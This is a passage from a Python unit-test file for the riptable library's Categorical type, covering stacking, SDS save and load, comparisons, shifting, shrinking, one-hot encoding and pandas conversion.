c2_flt = Categorical(flts2)
fa_str = hstack([strs, strs2])
fa_flt = hstack([flts, flts2])
# TODO add assertions for multikey Categoricals
c_str = Categorical(fa_str)
c_flt = Categorical(fa_flt)
# TODO move these into SDS save / load tests
paths = [r'riptable/tests/temp/ds1.sds', r'riptable/tests/temp/ds2.sds']
ds1 = Dataset(
{
'mkcat': c1,
'strcat': c1_str,
'fltcat': c1_flt,
'strfa': strs,
'fltfa': flts,
}
)
ds2 = Dataset(
{
'mkcat': c2,
'strcat': c2_str,
'fltcat': c2_flt,
'strfa': strs2,
'fltfa': flts2,
}
)
ds1.save(paths[0])
ds2.save(paths[1])
# normal dataset hstack
hstack_ds = hstack([ds1, ds2])
assert isinstance(hstack_ds, Dataset)
# dataset hstack from load
stack_load_ds = load_sds(paths, stack=True)
assert isinstance(stack_load_ds, PDataset)
# multikey cat hstack
hstack_mkcats = hstack([c1, c2])
assert isinstance(hstack_mkcats, Categorical)
# normal array hstack
hstack_strs = hstack([strs, strs2])
hstack_flts = hstack([flts, flts2])
# single cat hstack
hstack_cstrs = hstack([c1_str, c2_str])
assert isinstance(hstack_cstrs, Categorical)
hstack_cflts = hstack([c1_flt, c2_flt])
assert isinstance(hstack_cflts, Categorical)
assert bool(np.all(hstack_strs == hstack_cstrs.expand_array))
assert bool(np.all(hstack_flts == hstack_cflts.expand_array))
mktup = [*hstack_mkcats.category_dict.values()]
assert bool(np.all(hstack_mkcats._expand_array(mktup[0]) == fa_str))
assert bool(np.all(hstack_mkcats._expand_array(mktup[1]) == fa_flt))
mktup2 = [*stack_load_ds.mkcat.category_dict.values()]
assert bool(np.all(stack_load_ds.mkcat._expand_array(mktup2[0]) == fa_str))
assert bool(np.all(stack_load_ds.mkcat._expand_array(mktup2[1]) == fa_flt))
mktup3 = [*hstack_ds.mkcat.category_dict.values()]
assert bool(np.all(hstack_ds.mkcat._expand_array(mktup3[0]) == fa_str))
assert bool(np.all(hstack_ds.mkcat._expand_array(mktup3[1]) == fa_flt))
for p in paths:
os.remove(p)
# TO TEST:
# regular python Enum
# apply / apply_dataset, etc.
# def test_sort_copy(self):
# c = Categorical(np.random.choice(['a','b','c'], 15))
# d = c.sort_copy()
# c = Categorical([np.random.choice(['a','b','c'], 15), np.random.randint(0,3,15)])
# d = c.sort_copy()
# ----------------------------------------------------------
# def test_str_repr(self):
# '''
# SJK: We're still in the early stages of deciding how to print out or summarize a categorical in the workspace.
# Comment it out if repr or str changes, and I will fix up.
# '''
# # no break
# input = ['b', 'b', 'b', 'a', 'b', 'b']
# str_string = ', '.join(input)
# repr_string = "Categorical(["+str_string+"])"
# c = Categorical(input)
# self.assertEqual(str(c),str_string, msg=f"__str__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# self.assertEqual(c.__repr__(),repr_string, msg=f"__repr__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# # add break
# slice_size = 5
# input = ['b', 'b', 'b', 'a', 'b', 'b', 'b', 'b', 'b', 'a', 'b', 'b', 'c', 'c']
# str_string = ', '.join(input[:slice_size]+['...']+input[-slice_size:])
# repr_string = "Categorical(["+str_string+"])"
# c = Categorical(input)
# self.assertEqual(str(c),str_string, msg=f"__str__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# self.assertEqual(c.__repr__(),repr_string, msg=f"__repr__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
def test_as_string_array(self):
# SJK 10/4/2018 - as string array now returns bytes OR unicode (whatever type the string based categorical is holding)
f = np.array([b'b', b'b', b'b', b'a', b'b', b'b'])
c = Categorical(f)
is_equal = bool(np.all(c.as_string_array == f))
assert isinstance(c.as_string_array, FastArray), f"Categorical did not return a fastarray in as_string_array"
assert (
is_equal
), f"Categorical returned an incorrect string array {c.as_string_array} view of itself. Expected {f}"
def test_indexing_numeric(self):
c = Cat([1.1, 2.2, 3.3])
result = c['2.2']
assert np.all(result == [False, True, False])
def test_fill_forward(self):
fa = FA([1., np.nan, 1.])
c = Cat([1,1,1])
c.fill_forward(fa, inplace=True)
assert np.all(fa == [1., 1., 1.])
# TODO pytest parameterize `compare_func_names`
def test_all_compare_tests(self):
# with scalar
# cat(unicode)
i = 2
c1 = Categorical(three_ints)
if ShowCompareInfo:
print("Categorical:", c1)
if ShowCompareInfo:
print("Compare unicode to int scalar: 2")
self.compare_cat_test(c1, compare_func_names, int_success, i)
# cat(unicode) / unicode, unicode list
i = "AMZN\u2082"
c3 = Categorical(three_unicode)
if ShowCompareInfo:
print("Categorical:", c3)
if ShowCompareInfo:
print("Compare unicode cat to unicode string")
self.compare_cat_test(c3, compare_func_names, int_success, i)
if ShowCompareInfo:
print("Compare to list of unicode string")
self.compare_cat_test(c3, compare_func_names, int_success, [i])
if ShowCompareInfo:
print("Compare to a numpy array of unicode string")
self.compare_cat_test(c3, compare_func_names, int_success, np.array([i]))
# cat(bytes) / bytes, bytes list
i = b'b'
c4 = Categorical(three_bytes)
if ShowCompareInfo:
print("Categorical:", c4)
if ShowCompareInfo:
print("Compare bytes cat to bytestring")
self.compare_cat_test(c4, compare_func_names, int_success, i)
if ShowCompareInfo:
print("Compare to bytestring in list")
self.compare_cat_test(c4, compare_func_names, int_success, [i])
if ShowCompareInfo:
print("Compare to bytestring in numpy array")
self.compare_cat_test(c4, compare_func_names, int_success, np.array([i]))
# cat(bytes) / unicode, unicode list
i = "b"
c5 = Categorical(three_bytes)
if ShowCompareInfo:
print("Categorical:", c5)
if ShowCompareInfo:
print("Compare bytes cat to unicode string")
self.compare_cat_test(c5, compare_func_names, int_success, i)
if ShowCompareInfo:
print("Compare to unicode string in list")
self.compare_cat_test(c5, compare_func_names, int_success, [i])
if ShowCompareInfo:
print("Compare to unicode string in numpy array")
self.compare_cat_test(c5, compare_func_names, int_success, np.array([i]))
# equal categoricals (same dictionary)
# cat(bytes) / cat(bytes)
if ShowCompareInfo:
print("Compare two equal categoricals:")
if ShowCompareInfo:
print("Both from byte lists:")
c1 = Categorical(three_bytes)
c2 = Categorical(three_bytes)
if ShowCompareInfo:
print("cat1:", c1)
if ShowCompareInfo:
print("cat2:", c2)
self.compare_cat_test(c1, compare_func_names, same_success, c2)
# cat(unicode) / cat(unicode)
if ShowCompareInfo:
print("Both from unicode lists:")
c1 = Categorical(three_unicode)
c2 = Categorical(three_unicode)
if ShowCompareInfo:
print("cat1:", c1)
if ShowCompareInfo:
print("cat2:", c2)
self.compare_cat_test(c1, compare_func_names, same_success, c2)
# cat(unicode) / cat(bytes)
if ShowCompareInfo:
print("unicode/bytes list")
c1 = Categorical(["a", "b", "c"])
c2 = Categorical(three_bytes)
if ShowCompareInfo:
print("cat1:", c1)
if ShowCompareInfo:
print("cat2:", c2)
self.compare_cat_test(c1, compare_func_names, same_success, c2)
# unequal categoricals (same dictionary)
# cat(bytes) / cat(bytes)
if ShowCompareInfo:
print("Compare two unequal categoricals (same dict):")
if ShowCompareInfo:
print("both bytes")
c1 = Categorical([0, 1, 0], three_bytes)
c2 = Categorical([2, 1, 2], three_bytes)
if ShowCompareInfo:
print("cat1:", c1)
if ShowCompareInfo:
print("cat2:", c2)
self.compare_cat_test(c1, compare_func_names, diff_success, c2)
# cat(unicode) / cat(unicode)
if ShowCompareInfo:
print("both unicode")
c1 = Categorical([0, 1, 0], three_unicode)
c2 = Categorical([2, 1, 2], three_unicode)
if ShowCompareInfo:
print("cat1:", c1)
if ShowCompareInfo:
print("cat2:", c2)
self.compare_cat_test(c1, compare_func_names, diff_success, c2)
## cat(bytes) / int list (matching)
# if ShowCompareInfo: print("Compare categorical to matching int list")
# if ShowCompareInfo: print("bytes")
# i = [1,2,3]
# c1 = Categorical(three_bytes)
# self.compare_cat_test(c1,compare_func_names,same_success,i)
## cat(unicode) / int list (matching)
# if ShowCompareInfo: print("unicode")
# c1 = Categorical(three_unicode)
# self.compare_cat_test(c1,compare_func_names,same_success,i)
## cat(bytes) / int list (non-matching)
# if ShowCompareInfo: print("Compare categorical to non-matching int list")
# if ShowCompareInfo: print("bytes")
# i = [3,2,1]
# c1 = Categorical(three_bytes)
# self.compare_cat_test(c1,compare_func_names,int_success,i)
## cat(unicode) / int list(non-matching)
# if ShowCompareInfo: print("unicode")
# c1 = Categorical(three_unicode)
# self.compare_cat_test(c1,compare_func_names,int_success,i)
# def cat_slicing(self):
# three_unicode =FA(["AAPL\u2080","AMZN\u2082","IBM\u2081"])
# three_bytes = FA([b'a',b'b',b'c'])
# num_rows=8
# idx_size=15
# get_item_dicts = {
# "single_slices" : {
# ":2" : slice(None,2,None),
# "-2:": slice(-2,None,None),
# "2:5": slice(2,5,None),
# "5:" : slice(5,None,None),
# ":" : slice(None,None,None)
# },
# "bool_arrays" : {
# "python_bool" : [True, False, True, False, False, True, True, True, False, True, False, False, True, False, True],
# "numpy_bool" : np.array([True, False, True, False, False, True, True, True, False, True, False, False, True, False, True])
# },
# "int_indices" : { "int_idx_size"+str(idx_size) : np.random.randint(low=0,high=num_rows,size=idx_size) for idx_size in range(1,num_rows) }
# }
# failures = 0
# idx_list = np.random.randint(low=0,high=8,size=15)
# s_list = np.array([b'adam',b'bob',b'charlie',b'david',b'edward',b'frank',b'greg',b'harold'])
# c = Categorical(idx_list, s_list)
# for key, test_dict in get_item_dicts.items():
# print("\n\n"+key)
# for call_str, val in test_dict.items():
# success = s_list[idx_list[val]]
# if np.all(c[val].as_string_array == success):
# message = "success"
# else:
# message = "failure"
# failures += 1
# print(call_str, message)
# print("Tests complete with",failures,"errors")
# return c
@pytest.mark.xfail(
reason="RIP-215 - lead to inconsistent Categorical state; please add hypothesis tests when resolved."
)
def test_category_add(self):
cat = Categorical(list("bbcdebc"))
e = "a"
cat.category_add(e)
assert e in cat, "expect the added category to be added to the Categorical"
assert e in cat._categories, "expect the added category to be added to the Categorical._categories"
assert e in cat.category_array, "expect the added category to be added to the Categorical.category_array"
assert e in cat.category_dict, "expect the added category to be added to the Categorical.category_dict"
@pytest.mark.xfail(
reason="RIP-215 - lead to inconsistent Categorical state; please add hypothesis tests when resolved."
)
def test_category_remove(self):
cat = Categorical(list("bbcdebc"))
e = cat[0]
cat.category_remove(e)
assert e not in cat, "expect the removed category to be removed from the Categorical"
assert e not in cat._categories, "expect the removed category to be removed from the Categorical._categories"
assert (
e not in cat.category_array
), "expect the removed category to be removed from the Categorical.category_array"
assert (
e not in cat.category_dict
), "expect the removed category to be removed from the Categorical.category_dict"
# TODO move this to testing utils
def compare_cat_test(self, cat, compare_func_names, success_bools, i):
for fname, success in zip(compare_func_names, success_bools):
func = getattr(cat, fname)
result = func(i)
assert np.all(result == success), f'fail on {fname} {cat} {i}'
if ShowCompareInfo:
if np.all(result == success):
message = "succeeded"
else:
message = "failed"
print(fname, message)
def test_duplicated(self):
result = Cat([2, 3, 2], list('qwery')).duplicated()
assert np.all(result == FA([False, False, True]))
def test_cat_copy(self):
# add deep copy for enum, single, multi
x = arange(6, dtype=uint16) // 2
c = Cat(x, {0: 'Run', 1: 'Stop', 2: 'Start'}, dtype=uint16)
c[1] = 'Start'
a = c.copy()
d = a[:5]
a[1] = 'Run'
b = a[:5]
assert a._fa[1] == 0
assert b._fa[1] == 0
assert c._fa[1] == 2
assert d._fa[1] == 0
def test_assinglekey(self):
c = Cat([1, 2, 1, 2, 1, 2], {'Sunny': 1, 'Thunderstorms': 2})
# insert bad value
c._fa[3] = 17
c1 = c.as_singlekey(ordered=False)
c2 = c.as_singlekey(ordered=True)
assert np.all(c1.expand_array == c2.expand_array)
c = Cat([-1, -2, -1, -2, -1, -2], {'Sunny': -1, 'Thunderstorms': -2})
c._fa[3] = 17
c3 = c.as_singlekey(ordered=False)
c2 = c.as_singlekey(ordered=True)
assert np.all(c1.expand_array == c2.expand_array)
assert np.all(c3.expand_array == c2.expand_array)
# Cannot use the pytest.mark.parameterize decorator within classes that inherit from unittest.TestCase.
# Will need to migrate for unittest to pytest and fold the following categorical tests into Categorical_Test.
@pytest.mark.parametrize(
"categoricals",
[
# Categorical constructed from python list data
pytest.param(
[
Categorical(data)
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
],
id="cat_with_list_values",
),
# Categorical constructed from numpy array
pytest.param(
[
Categorical(np.array(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
],
id="cat_with_np_array_values",
),
# Categorical constructred from riptable fast array
pytest.param(
[
Categorical(rt.FastArray(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
],
id="cat_with_rt_fastarray_values",
),
# failed test cases
pytest.param(
[Categorical(data) for data in get_categorical_data_factory_method(CategoryMode.MultiKey)],
marks=[
pytest.mark.xfail(
reason="RIP-410 - Bug for MultiKey Categoricals: AttributeError: 'Categorical' object has no attribute 'ismultikey_labels'"
)
],
id="cat_with_tuple_values",
),
],
)
def test_one_hot_encode(categoricals):
for categorical in categoricals:
col_names, encoded_arrays = categorical.one_hot_encode()
category_array = categorical.category_array.astype('U')
# Test 1.1 The col_names are the same as the category array.
assert not set(category_array).symmetric_difference(set(col_names)), (
f"The column names should be the same as the names in the category array",
f"category array {category_array}\ncolumn names {col_names}",
)
# Test 1.2 The encoded_arrays dtypes are consistent with one another.
encoded_arrays_dtypes = set([fa.dtype for fa in encoded_arrays])
assert (
len(encoded_arrays_dtypes) == 1
), f"Encoded array dtypes should be consistent, got {encoded_arrays_dtypes}"
# todo for each category, assert the mask of the categorical is in the encoded_arrays
@pytest.mark.parametrize(
"categoricals",
[
# Categorical constructed from python list data
pytest.param(
[Categorical(data) for data in get_categorical_data_factory_method([CategoryMode.StringArray])],
id="cat_with_list_values",
),
# Categorical constructed from numpy array
pytest.param(
[Categorical(np.array(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray])],
id="cat_with_np_array_values",
),
# Categorical constructred from riptable fast array
pytest.param(
[
Categorical(rt.FastArray(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray])
],
id="cat_with_rt_fastarray_values",
),
],
)
def test_shift_cat(categoricals):
# todo Handle numeric invalid types for categoricals with values other than strings.
filtered_name = rt.rt_enum.FILTERED_LONG_NAME.encode("utf-8")
for categorical in categoricals:
cat_len = len(categorical)
for i in range(-cat_len + 1, cat_len): # exhaustive shift of all Categorical values.
# shift the categorical i-places
shift_cat = categorical.shift_cat(i)
# The category array should remain unchanged.
assert_array_equal(shift_cat.category_array, categorical.category_array)
# The underlying FastArray should have the items shifted to the i-th position.
if i > 0: # shift forwards case
assert_array_equal(
shift_cat._fa[i:], categorical._fa[:-i], f"FastArray items should be shifted by {i} postions.",
)
# The Categorical should have the values shifted to the i-th position.
cat_values, shift_cat_values = (
categorical.expand_array,
shift_cat.expand_array,
)
assert_array_equal(
shift_cat_values[i:], cat_values[:-i], f"Categorical values should be shifted by {i} positions.",
)
# The underlying FastArray should have the first i-items to be the invalid value.
# The Categorical values should have the first i-items be the filtered or invalid name.
# Need to handle other invalid values and other Categorical base indexing.
assert_array_equal(
shift_cat_values[:i],
np.full(i, filtered_name),
f"Shifted Categorical values up to {i}-th position should be '{filtered_name}'.",
)
assert_array_equal(
shift_cat._fa[:i],
np.zeros(i),
f"Shifted Categorical underlying FastArray items up to {i}-th position should be the invalid value 0.",
)
elif i < 0: # shifted backwards case
i = abs(i) # slicing arithmetic based on positional value of i
assert_array_equal(
shift_cat._fa[: cat_len - i],
categorical._fa[i:],
f"FastArray items should be shifted by -{i} postions.",
)
cat_values, shift_cat_values = (
categorical.expand_array,
shift_cat.expand_array,
)
assert_array_equal(
shift_cat_values[: cat_len - i],
cat_values[i:],
f"Categorical values should be shifted by -{i} positions.",
)
assert_array_equal(
shift_cat_values[-i:],
np.full(i, filtered_name),
f"Shifted Categorical values up to -{i}-th position should be '{filtered_name}'.",
)
assert_array_equal(
shift_cat._fa[-i:],
np.zeros(i),
f"Shifted Categorical underlying FastArray items up to -{i}-th position should be the invalid value 0.",
)
elif i == 0: # zero-th shift case
# test for equality
assert_array_equal(shift_cat.category_array, categorical.category_array)
assert_array_equal(shift_cat._fa, categorical._fa)
cat_values, shift_cat_values = (
categorical.expand_array,
shift_cat.expand_array,
)
assert_array_equal(shift_cat_values, cat_values)
# shift overflow for backward and forward case up to two values
for i in list(range(-cat_len - 2, -cat_len)) + list(range(cat_len, cat_len + 2)):
shift_cat = categorical.shift_cat(i)
assert_array_equal(shift_cat.category_array, categorical.category_array)
# Investigate possible bug with expanding Categorical values. E.g.:
# given:
# Categorical([a, a, a, a, a, a, a, a, a, a]) Length: 10
# FastArray([1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int8) Base Index: 1
# FastArray([b'a'], dtype='|S1') Unique count: 1
# shifted categorical
# Categorical([Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered]) Length: 10
# FastArray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int8) Base Index: 1
# FastArray([b'a'], dtype='|S1') Unique count: 1
# got
# E x: FastArray([b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'a'], dtype='|S8')
# E y: array([b'Filtered', b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'Filtered', b'Filtered', b'Filtered', b'Filtered'],
# E dtype='|S8')
# Expected all values to be b'Filtered', but saw b'a'.
# todo assert_array_equal(shift_cat_values, np.full(cat_len, filtered_name), f"Overflow shifted Categorical values. All values are expected to be invalid '{filtered_name}'.")
assert_array_equal(
shift_cat._fa,
np.zeros(cat_len),
f"Overflow shifted Categorical underlying FastArray items. All values are expected to be invalid value 0.",
)
@pytest.mark.parametrize(
# TODO - add base 0 and base 1 indexing w/ expectations
"categoricals",
[
# Categorical constructed from python list data
pytest.param(
[Categorical(data) for data in get_categorical_data_factory_method([CategoryMode.StringArray])],
id="cat_with_list_values",
),
# Categorical constructed from numpy array
pytest.param(
[Categorical(np.array(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray])],
id="cat_with_np_array_values",
),
# Categorical constructred from riptable fast array
pytest.param(
[
Categorical(rt.FastArray(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray])
],
id="cat_with_rt_fastarray_values",
),
],
)
@pytest.mark.parametrize("misc", [None, "INVALID"]) # TODO - add numeric values
@pytest.mark.parametrize("inplace", [False, True])
def test_shrink(categoricals, misc, inplace):
for categorical in categoricals:
cat = categorical.copy(deep=True) # deep copy so test data remains unchanged with inplace shrinks
# Test 1 Shrink with empty values.
# Shrink to empty categories.
shrink_cat = cat.shrink([], misc=misc, inplace=inplace)
# Type is preserved after shrinking.
assert isinstance(shrink_cat, Categorical), "shrink_cat should be a Categorical."
if misc is None:
# For base index 1 Categorical, the underlying FastArray should be all zeros.
assert_array_equal(shrink_cat._fa, np.zeros(len(cat)))
# The Categorical categories should be empty.
expected_category_array = np.empty(0)
assert_array_equal(
shrink_cat.category_array, expected_category_array, f"Category dictionary values should be empty.",
)
for arr in shrink_cat.category_dict.values():
assert_array_equal(
arr, expected_category_array, f"Category dictionary values should be empty.",
)
# TODO expanding shrink categorical does not return original types invalid value; instead it returns nans
# N.B, when shrinking, the category array type changes to float64
# E x: FastArray([nan])
# E y: array([b'Filtered'], dtype='|S8')
# assert_array_equal(shrink_cat.expand_array, np.full(len(cat), filtered_name), f"Given empty values, shrink categorical values should all be invalid '{filtered_name}'.")
else: # single categories being the specified misc
# TODO - consider any constraints to assert on for the dtype?
# The invalid value based on the dtype: e.g., for U32 its -2147483646
# assert_array_equal(shrink_cat._fa, InvalidValuesForDtype)
# assert_array_equal(shrink_cat.expand_array, InvalidValuesForDtypeExpanded)
# The categories should only contain the misc value.
expected_category_array = np.array(misc)
assert_array_equal(
shrink_cat.category_array,
expected_category_array,
f"Category array should only contain the '{misc}' category.",
)
for arr in shrink_cat.category_dict.values():
assert_array_equal(
arr,
expected_category_array,
f"Category dictionary values should only contain the '{misc}' category.",
)
# Test 2 Shrink with same categories
cat = categorical.copy(deep=True)
# Shrink to all the same categories.
shrink_cat = cat.shrink(cat.category_array, misc=misc, inplace=inplace)
# Type is preserved after shrinking.
assert isinstance(shrink_cat, Categorical), "shrink_cat should be a Categorical."
if misc is None: # TODO handle the misc not None case
shrink_cat_values, cat_values = shrink_cat.expand_array, cat.expand_array
assert_array_equal(shrink_cat_values, cat_values)
assert_array_equal(shrink_cat._fa, cat._fa)
assert_array_equal(shrink_cat.category_array, cat.category_array)
for arr, expected_arr in zip(shrink_cat.category_dict.values(), cat.category_dict.values()):
assert_array_equal(arr, expected_arr)
# TODO Test 3 Shrink with subset of categories
cat = categorical.copy(deep=True)
# Shrink to all the same categories.
n = int(len(cat) / 2)
shrink_cat = cat.shrink(cat.category_array[:n], misc=misc, inplace=inplace)
# Type is preserved after shrinking.
assert isinstance(shrink_cat, Categorical), "shrink_cat should be a Categorical."
@pytest.mark.parametrize(
"categoricals",
[
# TODO - test categorical construction using numpy and riptable arrays as a separate test
# Categorical constructed from python list data
pytest.param([Categorical(data) for data in get_categorical_data_factory_method()], id="cat_with_list_values",),
# Categorical constructed from numpy array
pytest.param(
[
Categorical(np.array(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
],
id="cat_with_np_array_values",
),
# Categorical constructred from riptable fast array
pytest.param(
[
Categorical(rt.FastArray(data))
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
],
id="cat_with_rt_fastarray_values",
),
],
)
def test_sds(categoricals, tmpdir):
dir = tmpdir.mkdir("test_categorical_sds")
for i, cat in enumerate(categoricals):
name = "categorical_" + str(i)
p = str(dir.join(name))
save_sds(p, cat)
cat2 = load_sds(p)
# Test 1 Saved and loaded categoricals should be the same.
# TODO vary the meta version optional parameter when calling Categorical._load_from_sds_meta_data
assert isinstance(cat2, Categorical)
assert_array_equal(cat2._fa, cat._fa)
if not cat.ismultikey: # MultiKey Categorical's do not support category_array operation
assert_array_equal(cat2.category_array, cat.category_array)
for actual, expected in zip(cat2.category_dict.values(), cat.category_dict.values()):
assert_array_equal(actual, expected)
cat2_values, cat_values = cat2.expand_array, cat.expand_array
assert_array_equal(cat2_values, cat_values)
# Test 2 As and from meta data Categoricals should be the same.
cat3 = Categorical._from_meta_data(*cat._as_meta_data(name=name))
# Saved and loaded categoricals should be the same.
assert isinstance(cat3, Categorical)
assert_array_equal(cat3._fa, cat._fa)
if not cat.ismultikey: # MultiKey Categorical's do not support category_array operation
assert_array_equal(cat3.category_array, cat.category_array)
for actual, expected in zip(cat3.category_dict.values(), cat.category_dict.values()):
assert_array_equal(actual, expected)
cat3_values, cat_values = cat3.expand_array, cat.expand_array
assert_array_equal(cat3_values, cat_values)
@pytest.mark.parametrize(
"categoricals",
[
# TODO handle CategoryMode IntEnum and Default
[
Categorical(data)
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
]
+ [
Categorical(data, base_index=0)
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
]
],
)
def test_from_bin(categoricals):
for cat in categoricals:
cat_arr_len = len(cat.category_array)
# Test 1 All bin values are in the category array.
if cat.base_index == 0:
for i in range(cat_arr_len):
assert cat.from_bin(i) in cat.category_array
elif cat.base_index == 1:
for i in range(1, cat_arr_len + 1):
assert cat.from_bin(i) in cat.category_array
else:
raise ValueError(f"Unhandled Categorical base index {cat.base_index}")
# Test 2 Handling of invalid input types: base_index and bin.
# The bin is not an integer.
with pytest.raises(TypeError):
cat.from_bin(str(i))
cat.from_bin(float(i))
# Bin value out of range.
with pytest.raises(ValueError):
cat.from_bin(-1)
if cat.base_index == 0:
cat.from_bin(cat_arr_len)
elif cat.base_index == 1:
cat.from_bin(0)
cat.from_bin(cat_arr_len + 1)
else:
raise ValueError(f"Unhandled Categorical base index {cat.base_index}")
# The base index is None.
cat.grouping._base_index = None
with pytest.raises(TypeError):
cat.from_bin(1)
@pytest.mark.parametrize("cat", get_all_categorical_data())
def test_argsort(cat):
assert_array_equal(
cat.argsort(),
np.argsort(cat._fa),
"Categorical argsort should be equivalent to the argsort of the underlying FastArray",
)
@pytest.mark.parametrize(
"cats",
[
pytest.param(
[
Categorical(data)
for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray])
]
),
pytest.param(
[Categorical(data) for data in get_categorical_data_factory_method(CategoryMode.MultiKey)],
marks=[
pytest.mark.xfail(reason="NotImplementedError: Add categories not supported for MultiKey Categoricals")
],
),
],
) # TODO parameterize across base index 0 and 1
def test_auto_add(cats):
for cat in cats:
alpha, beta = "alpha", "beta"
first_index, last_index = 0, len(cat) - 1
# Test 1 auto_add_on will allow addition of a category if the Categorical is unlocked,
# otherwise an error is raised.
cat.auto_add_on()
cat.unlock() # Categorical is unlocked
# Test 1.1 When unlocked and attempting to add a category, the categories should be added.
# set the first and last categories
cat[first_index] = cat[last_index] = alpha
# auto_add_on and unlock should not allow setting beyond the first and last index of categories
with pytest.raises(IndexError): # index out of bounds
cat[first_index - 1] = alpha
cat[last_index + 1] = alpha
# category is added at specified index
first_category = cat.category_array[cat._fa[first_index] - 1]
# TODO normalize the category_array value, which is sometimes a numpy str_ or bytes_ to an ascii and compare
# assert cat.category_array[cat._fa[first_index]-1] == alpha
# assert at.category_array[cat._fa[last_index]-1] == alpha
# added category is in category array and dictionary
assert alpha in cat.category_array
for categories in cat.category_dict.values():
assert alpha in categories
# Test 1.2 When locked and attempting to add a category, an error is raised and the categories should not be added.
cat.lock() # Categorical is locked
with pytest.raises(IndexError): # cannot add a category since index is locked
cat[first_index] = beta
assert beta not in cat.category_array
for categories in cat.category_dict.values():
assert beta not in categories
# Test 2 auto_add_off will prevent category assignment of non-existing categories and raise an error
cat.auto_add_off()
# Test 2.1 Unlocked case
cat.unlock() # Categorical is unlocked
with pytest.raises(ValueError): # cannot automatically add categories while auto_add_categories is False
cat[first_index] = beta
# Test 2.2 Locked case
cat.lock()
with pytest.raises(IndexError): # cannot add a category since index is locked
cat[first_index] = beta
@pytest.mark.xfail(reason="rt_numpy.unique() needs to handles multikey categoricals")
def test_multikey_categorical_unique():
c = Categorical([arange(3), FA(list('abc'))])
assert len(c.unique()) == c.nunique()
@pytest.mark.parametrize("values", [list_bytes, list_unicode, list_true_unicode])
def test_categorical_convert(values):
categories = list(set(values))
# pd_c is a pandas Categorical with a missing category.
# pandas Categorical will designate the values with a missing category by -1.
pd_c = pd.Categorical(values, categories=categories[:-1])
# The output of categorical_convert, when applied to a pandas Categorical, can be used to
# construct a riptable Categorical. We test that this handles missing categories correctly.
rt_values, rt_categories = rt.categorical_convert(pd_c)
cat = rt.Categorical(rt_values, categories=rt_categories)
# The invalid category should not be in the Categorical.
missing_category = categories[-1]
assert missing_category not in cat
assert missing_category not in cat._categories
assert missing_category not in cat.category_array
assert missing_category not in cat.category_dict[next(iter(cat.category_dict))] # values of first key
# All other category values should be in the Categorical.
for e in categories[:-1]:
# assert e in cat # uncomment when test_categorical_convert_xfail is fixed
assert e in cat._categories
assert e in cat.category_array
assert e in cat.category_dict[next(iter(cat.category_dict))] # values of first key
@pytest.mark.xfail(reason="RIP-396 - category not in Categorical, but is in Categorical.category_array")
@pytest.mark.parametrize("values", [list_bytes,])
def test_categorical_convert_xfail(values):
categories = list(set(values))
# pd_c is a pandas Categorical with a missing category.
# pandas Categorical will designate the values with a missing category by -1.
pd_c = pd.Categorical(values, categories=categories[:-1])
rt_values, rt_categories = rt.categorical_convert(pd_c)
cat = rt.Categorical(rt_values, categories=rt_categories)
# All other category values should be in the Categorical.
for e in categories[:-1]:
assert e in cat
def test_build_dicts_enum():
str_to_int, int_to_str = Categories.build_dicts_enum(LikertDecision)
codes = list(str_to_int.values()) * 2
c = Categorical(codes, categories=LikertDecision)
c2 = Categorical(codes, categories=str_to_int)
c3 = Categorical(codes, categories=int_to_str)
# c is the our oracle Categorical.
# Categoricals constructed from any of the dictionaries built by build_dicts_enum
# should construct the same Categorical as c.
assert_array_equal(c, c2)
assert_array_equal(c, c3)
@pytest.mark.parametrize("values", [list("abcdef"), [b"a", b"b", b"c", b"d", b"e", b"f"]])
def test_build_dicts_python(values):
# int
d = {k: v for k, v in enumerate(values)}
str_to_int, int_to_str = Categories.build_dicts_python(d)
codes = list(d.keys()) * 2
c = Categorical(codes, categories=d)
c2 = Categorical(codes, categories=str_to_int)
c3 = Categorical(codes, categories=int_to_str)
# c is the our oracle Categorical.
# Categoricals constructed from any of the dictionaries built by build_dicts_python
# should construct the same Categorical as c.
assert_array_equal(c, c2)
assert_array_equal(c, c3)
@pytest.mark.parametrize(
"a,b,a_in_b,b_in_a",
[
pytest.param(Cat(list('abc')), Cat(list('a')), FA([True, False, False]), FA([True]), id='single_key_overlap'),
pytest.param(
Cat([FA(list('abc')), FA([1,2,3])]),
Cat([FA(list('a')), FA([1])]),
FA([True, False, False]),
FA([True]),
id='single_multikey_overlap'
),
pytest.param(
Cat([FA(list('abc')), FA([1,2,3])]),
Cat([FA(list('ab')), FA([1,2])]),
FA([True, True, False]),
FA([True, True]),
id='two_multikey_overlap'
),
pytest.param(
Cat([FA(list('abcde')), FA([1,2,3,4,5])]),
Cat([FA(list('dc')), FA([4,5])]),
FA([False, False, False, True, False]),
FA([True, False]),
id='single_multikey_overlap2'
),
pytest.param(
Cat([FA(list('abcde')), FA([1,2,3,4,5])]),
Cat([FA(list('aba')), FA([1,2,1])]),
FA([True, True, False, False, False]),
FA([True, True, True]),
id='repeated_key_multikey_overlap'
),
pytest.param(
Cat([FA(list('abcdeab')), FA([1,2,3,4,5,1,6])]),
Cat([FA(list('aba')), FA([1, 2, 1])]),
FA([True, True, False, False, False, True, False]),
